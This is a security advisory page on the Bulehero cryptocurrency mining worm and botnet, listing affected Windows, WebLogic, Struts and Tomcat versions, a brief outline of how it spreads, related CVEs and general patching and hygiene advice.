Bulehero Cryptocurrency Mining Worm

First observed in May 2018, Bulehero is a cryptocurrency mining worm and botnet that uses living-off-the-land techniques to compromise devices and avoid security systems.

Threat ID:: CC-2941
Category:: Worm, Botnet, Cryptocurrency, Miner
Threat Severity:: Low
Threat Vector:: Exploit, Insecure network, Backdoor, Hacking tool
Published:: 21 February 2019 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

First observed in May 2018, Bulehero is a cryptocurrency mining worm and botnet that uses living-off-the-land techniques to compromise devices and avoid security systems.

Affected platforms

The following platforms are known to be affected:

Microsoft Windows

Microsoft Windows - All versions

Microsoft Windows Server - All versions
Oracle WebLogic Server - Versions 12.1.2.2.x and earlier
Apache Struts 2 - Versions 2.5.12 and earlier
Apache Tomcat - Versions 7.0.79 to 7.0.0

Threat details

The group operating Bulehero use a number of known exploits to compromise vulnerable web servers. Once they have gained access, they will execute PowerShell or VBScript scripts to download and install a primary payload. This payload will create a hidden process to gain persistence before downloading a secondary payload.

This second payload contains versions of the EternalBlue exploit and DoublePulsar backdoor, or brute-force attacks. If successful, Bulehero will download a new copy of the primary payload to the affected device.

For further information:

Remediation steps

Type	Step
	Users and administrators are encouraged to review SMB EternalBlue and DoublePulsar Exploit CC-1353 and apply the necessary updates immediately if they have not already done so. To prevent and detect a trojan infection, ensure that: A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails. All operating systems, anti-virus and other security products are kept up-to-date. Regular anti-virus and security scans are performed on your organisation’s estate. All day-to-day computer activities such as email and internet are performed using non-administrative accounts. Strong password policies are in place. Network, proxy and firewall logs should be monitored for suspicious activity. User accounts accessed from affected devices should be reset on a clean computer. Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.

Type

Step

Users and administrators are encouraged to review SMB EternalBlue and DoublePulsar Exploit CC-1353 and apply the necessary updates immediately if they have not already done so.

To prevent and detect a trojan infection, ensure that:

A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
All operating systems, anti-virus and other security products are kept up-to-date.
Regular anti-virus and security scans are performed on your organisation’s estate.
All day-to-day computer activities such as email and internet are performed using non-administrative accounts.
Strong password policies are in place.
Network, proxy and firewall logs should be monitored for suspicious activity.
User accounts accessed from affected devices should be reset on a clean computer.
Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.

CVE Vulnerabilities

CVE-2017-5638

CVE-2017-9805

CVE-2017-10271

CVE-2017-12615

Last edited: 11 January 2022 9:43 am